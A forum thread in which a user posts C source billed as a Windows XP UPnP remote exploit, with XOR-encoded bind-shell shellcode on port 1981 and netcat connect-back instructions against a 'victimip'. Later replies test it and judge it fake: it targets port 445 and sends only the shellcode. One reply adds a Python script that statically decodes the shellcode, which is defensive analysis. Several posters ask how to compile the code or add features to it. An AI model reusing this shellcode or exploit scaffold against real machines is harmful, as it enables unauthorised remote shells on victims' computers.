qcred11
QUOTE


/*
***************** EXPLOIT CODED BY JOCANOR *****************

this is a new and functional exploit for the vulnerability
that affects Windows XP, at the UPNP service, port 5000.

this exploit is a part of the ASQ12 project, same as XPhack.c, coded
also by me...

you only type:

  argoxp victimip

and later, in another cmd type:

  nc victimip 1981

note:

you need netcat.

note2:

this exploit affects Windows XP + SP0 English version.

***************** EXPLOIT CODED BY JOCANOR *****************

*/
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strcat(), memset() */
#include <windows.h>  /* also pulls in the Winsock 1.1 API used below */

#pragma comment(lib, "ws2_32")

/* XOR-encoded bind-shell payload (listens on TCP port 1981 once it runs).
   As the discussion below points out, this buffer is the only thing the
   program ever sends. */
char shell[] = //bind port 1981
        "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
        "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
        "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
        "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
        "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
        "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
        "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
        "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
        "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
        "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
        "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
        "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
        "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
        "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
        "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
        "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
        "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
        "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
        "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
        "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
        "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
        "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
        "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
        "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
        "\xFA\xFA\xFC\xE9\xED\x99";


int main(int argc, char *argv[])
{
    char recvbuf[1600];
    char szRequest[2048];
    char szJmpCode[281];
    char szExeCode[840];
    int i;
    WSADATA wsa;
    struct hostent *he;
    struct sockaddr_in their_addr;
    int len, sockfd;
    short dport = 445;   /* TCP 445 (SMB), not the UPnP port 5000 claimed in the header */

    printf("\n ArgoXP 1.0 beta \n");
    printf(" ExPlOiT CoDeD By: JoCaNoR \n");
    printf("Member of: SlackTeam...Jocanor, nkde, zet4 & zerok\n");
    printf(" .-.-.Especial thanks to Neo_geno & Lide.-.-.\n\n");

    if (argc < 2)
    {
        printf("How to use: ");
        printf("Argoxp <victim ip>\n\n");
        exit(0);
    }

    /* NOP sled, four hard-coded address bytes (0x77E33F4D little-endian),
       more NOPs, a short jump sequence, and a terminating NUL */
    for (i = 0; i < 268; i++) szJmpCode[i] = (char)0x90;

    szJmpCode[268] = (char)0x4D; szJmpCode[269] = (char)0x3F;
    szJmpCode[270] = (char)0xE3; szJmpCode[271] = (char)0x77;
    szJmpCode[272] = (char)0x90; szJmpCode[273] = (char)0x90;
    szJmpCode[274] = (char)0x90; szJmpCode[275] = (char)0x90;

    szJmpCode[276] = (char)0xFF; szJmpCode[277] = (char)0x63;
    szJmpCode[278] = (char)0x64; szJmpCode[279] = (char)0x90;
    szJmpCode[280] = (char)0x00;

    /* 32 NOPs followed by the payload */
    for (i = 0; i < 32; i++) szExeCode[i] = (char)0x90;
    szExeCode[32] = (char)0x00;

    strcat(szExeCode, shell);

    /* szRequest is assembled here but never used: the send() below transmits
       the bare shell[] buffer, and no UPnP/SSDP request is ever built. */
    sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);

    WSAStartup(MAKEWORD(2, 0), &wsa);

    if ((he = gethostbyname(argv[1])) == NULL)
    {
        perror("Unable to resolve");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("socket error");
        exit(1);
    }

    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(dport);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);

    printf("Waiting for connection...");
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        printf("\nError, unable to connect!!!");
        exit(1);
    }

    printf("Connected!!!\n");

    /* Sends the raw, unencoded-by-protocol payload straight to port 445 */
    if (send(sockfd, shell, sizeof(shell) - 1, 0) == -1)
    {
        printf("Error :(:(:(\n");
        exit(1);
    }

    printf("OoOoOps shell!!\n");
    /* Blocks here waiting for a reply the target has no reason to send */
    len = recv(sockfd, recvbuf, 1600, 0);

    return 0;
}

//***************** EXPLOIT CODED BY JOCANOR *****************

TRi
Hey nice, thanks for the info. Will try to compile and test this soon.
slynx
Has anyone tested this exploit? Sorry but I'm a little skeptical...there have been
a lot of fake UPNP exploits, and it kinda got to me.....

If I have any results with this I will share. Thanks for posting.

UPDATE: wow.... I can't believe it compiled w/ 0 errors.... (lmao)

UPDATE: This code is somewhat bogus. First of all, there is a recv() called after
sending the 'exploit', which just hangs the connection for no apparent reason. Of
course, there might actually be a reason for that.... but there isn't a reason for
creating szRequest and then sending shell when shell is just the shellcode for a
bind..... (???) Also, I don't see any of the UPNP protocol request being made (like
NOTIFY...). Of course I might be wrong on all of this.... I don't have a box running
XP w/ SP0 so I can't test it.... does anybody here have an SP0 box for testing?
TRi
This is indeed kinda odd for me too.
I tried it on my machines; because that didn't work, I tried some other machines with no outcome.

If anybody got a successful attempt with it, please tell us, because I wonder if this thingy works at all.
EXPLOiTED
I got a test box. Can you upload the compiled exe? I get compile errors.
mortello
I'm skeptical.... I see a dport = 445....

but 445 isn't the UPnP port.... so it may be me that doesn't understand the code (which could be because I am not an expert in C/C++ but more in Java).

But anyway I found that part strange.... and I believe it's called by htons, which normally is used to connect to an IP....
twistedps
yeh it doesn't even call port 5000... wtf... I'm gonna stay away from this, god knows what lies in that shellcode.
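The question of what is in that shellcode can be answered without ever running it. The blob starts with a recognisable jmp/call/pop decoder (`EB 10 5A 4A 33 C9 66 B9 <len> 80 34 0A <key> E2 FA`), so the XOR key and the length of the encoded region can be read straight out of the first 23 bytes and the rest unpacked statically. The script below is an added example written for this thread, not code from the original post; it embeds the posted bytes verbatim, matches only that particular stub shape (other encoders need their own parser), and pulls out the API-name strings and the sockaddr_in port the payload writes, so a reviewer can confirm it is a plain WSASocket/bind/listen/accept bind shell on port 1981 and nothing else.

```python
import re
import struct

# Bind-shell blob exactly as posted in the thread above (381 bytes).
POSTED_SHELLCODE = bytes.fromhex(
    "EB105A4A33C966B9660180340A99E2FA"
    "EB05E8EBFFFFFF"
    "7099989999C321956964E6129912E985"
    "3412D991124112EAA59A6A12EFE19A6A"
    "12E7B99A6212D78DAA74CFCEC812A69A"
    "62126BF397C06A3FED91C0C61A5E9DDC"
    "7B70C0C6C7125412DFBD9A5A48789A58"
    "AA50FF129112DF859A5A58789B9A5812"
    "999A5A1263126E1A5F971249F39AC071"
    "E59999991A5F94CBCF66CE65C31241F3"
    "9DC071F0999999C9C9C9C9F398F39B66"
    "CE6912415E9E9B999E24AA5910DE9DF3"
    "89CECA66CE6DF398CA66CE61C9C9CA66"
    "CE651A75DD126DAA42F389C01085177B"
    "6210DFA110DFA510DFD95EDFB5989899"
    "9914DE89C9CFCACACAF398CACA5EDEA5"
    "FAF4FD9914DEA5C9CA66CE7DC966CE71"
    "AA59351C59EC60C8CBCFCA664BC3C032"
    "7B77AA595A7162676666DEFCEDC9EBF6"
    "FAD8FDFDEBFCEAEA99DAEBFCF8EDFCC9"
    "EBF6FAFCEAEAD899DCE1F0EDC9EBF6FA"
    "FCEAEA99D5F6F8FDD5F0FBEBF8EBE0D8"
    "99EEEAABC6AAAB99CECAD8CAF6FAF2FC"
    "EDD899FBF0F7FD99F5F0EAEDFCF799F8"
    "FAFAFCE9ED99"
)


def parse_decoder_stub(sc):
    """Match the 23-byte decoder at the front of the blob:
         EB 10           jmp  short +0x10   (to the call below)
         5A              pop  edx           (edx = address after the call)
         4A              dec  edx
         33 C9           xor  ecx, ecx
         66 B9 ll hh     mov  cx, length
         80 34 0A kk     xor  byte [edx+ecx], key
         E2 FA           loop (back to the xor)
         EB 05           jmp  short +5      (into the decoded bytes)
         E8 EB FF FF FF  call -0x15         (to the pop edx)
    Returns (payload_offset, payload_length, xor_key)."""
    if sc[0:8] != b"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9":
        raise ValueError("unexpected decoder prologue")
    length = struct.unpack_from("<H", sc, 8)[0]
    if sc[10:13] != b"\x80\x34\x0A" or sc[14:23] != b"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF":
        raise ValueError("unexpected decoder loop")
    key = sc[13]
    # The call pushes offset 0x17; dec edx makes it 0x16, and the loop runs
    # with ecx = length .. 1, so the encoded region is sc[0x17 : 0x17 + length].
    return 0x17, length, key


def decode_payload(sc):
    off, length, key = parse_decoder_stub(sc)
    if off + length != len(sc):
        raise ValueError("decoder length does not match blob size")
    return bytes(b ^ key for b in sc[off:off + length])


def extract_strings(data, min_len=4):
    """Printable ASCII runs in the decoded payload: the DLL and API names the
    shellcode resolves by hand at run time."""
    pattern = re.compile(b"[\\x20-\\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_bind_port(decoded):
    """The payload fills a sockaddr_in in place with `mov dword ptr [edi], imm32`
    (C7 07 ...) whose immediate is family=AF_INET (02 00) followed by the port
    in network byte order."""
    idx = decoded.find(b"\xC7\x07\x02\x00")
    if idx < 0:
        return None
    return struct.unpack_from(">H", decoded, idx + 4)[0]


def triage(sc):
    off, length, key = parse_decoder_stub(sc)
    decoded = decode_payload(sc)
    return {
        "xor_key": key,
        "encoded_bytes": length,
        "strings": extract_strings(decoded),
        "bind_port": find_bind_port(decoded),
    }


if __name__ == "__main__":
    report = triage(POSTED_SHELLCODE)
    print("XOR key 0x%02X, %d encoded bytes" % (report["xor_key"], report["encoded_bytes"]))
    print("bind port:", report["bind_port"])
    print("strings:", ", ".join(report["strings"]))
```

The first decoded bytes are `E9 00 01 00 00` (a jmp over the embedded string table), and the strings come out as ws2_32, WSASocketA, bind, listen, accept, LoadLibraryA, GetProcAddress, CreateProcessA and ExitProcess, with the sockaddr_in write carrying port 0x07BD = 1981. That matches the "bind port 1981" comment in the source, and it also means the payload contains nothing that speaks UPnP: whatever the program sends to port 445 is just this listener.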
stonebreaker
This exploit is too old.
Most machines have patched.
Basti
Is there a possibility to add a bindshell? 'cause typing nc ip 1981 for all IPs sucks :-/
Ecko
Successfully compiled with VC++

*edit*

didn't work for me

ArgoXP 1.0 beta
ExPlOiT CoDeD By: JoCaNoR
Member of: SlackTeam...Jocanor, nkde, zet4 & zerok
.-.-.Especial thanks to Neo_geno & Lide.-.-.

Waiting for connection...Connected!!!
OoOoOps shell!!

but no successful connection with nc!

*edit2*

@stonebreaker

read the first lines of the source:

QUOTE

***************** EXPLOIT CODED BY JOCANOR *****************

this is a new and functional exploit for the vulnerability
that affects Windows XP, at the UPNP service, port 5000
320X
Yea Ecko is right, I compiled with VC++ and that's the result
ArgoXP 1.0 beta
ExPlOiT CoDeD By: JoCaNoR
Member of: SlackTeam...Jocanor, nkde, zet4 & zerok
.-.-.Especial thanks to Neo_geno & Lide.-.-.

Waiting for connection...Connected!!!
OoOoOps shell!!


WINXP

nc 192.168.0.1 1981

nc refuses it
som3aa
could someone compile it plz?
ComSec
@som3aa

READ the rules.... NO compile requests!!!! Either you can or you cannot do it!

About time some of you learned how to!!!
SkyRaVeR
This is a non-working xploit..
The PnP port is 5000 like mentioned before.. 445 is the RPC port..

Even when the msg "OoOoOps shell!!" appears, the xploit just said that it sent its "xploit code", so that's all..
Just forget 'bout it - you'll never get a shell with this code!

so far, sky
UnDeRTaKeR
any good working upnp exploit that still works? :\
TheOther
Great job, qcred11!!

On what is this vulnerability based? MS0?-??

nuorder
QUOTE (TheOther @ Jun 26 2004, 01:01 AM)
Great job, qcred11!!

On what is this vulnerability based? MS0?-??

QUOTE
Microsoft Security Bulletin MS01-059
Unchecked Buffer in Universal Plug and Play can Lead to System Compromise

Originally posted: December 20, 2001
Updated: May 09, 2003

Very old - pre SP1, but still interesting.

I just ran this through the works: apimonitor, file system call monitor, packet log, process viewers, etc. It seemed to use the standard DLLs like winsock and the LDAP one and sent 5 packets across the network to the specified target (patched, though, 'cos I don't have XP pre-SP1) when initially run.
The packets didn't seem to contain any meaningful info as to what it was sending, though - probably just its shellcode.
slynx
First of all, the exploit is fake. Second, if you wanted it to send anything but its
shellcode, you need to modify it (see previous post).
nuorder
Agreed, and it doesn't do anything it's not supposed to either.
MasterWeb
I think the exploit is fake, I tested this exploit on 6 machines!
Basti
Look at the source code.. a n00b would see that's fake.
ivan288
QUOTE
short dport = 445;


that's simply wrong!
Anyone should know how to fix that.
tibbar
This one's in the Bugtraq archives, http://www.securityfocus.com/archive/1/367061, but I agree it's fake.

The port 445 instead of 5000 is wrong. Don't waste your time on this one.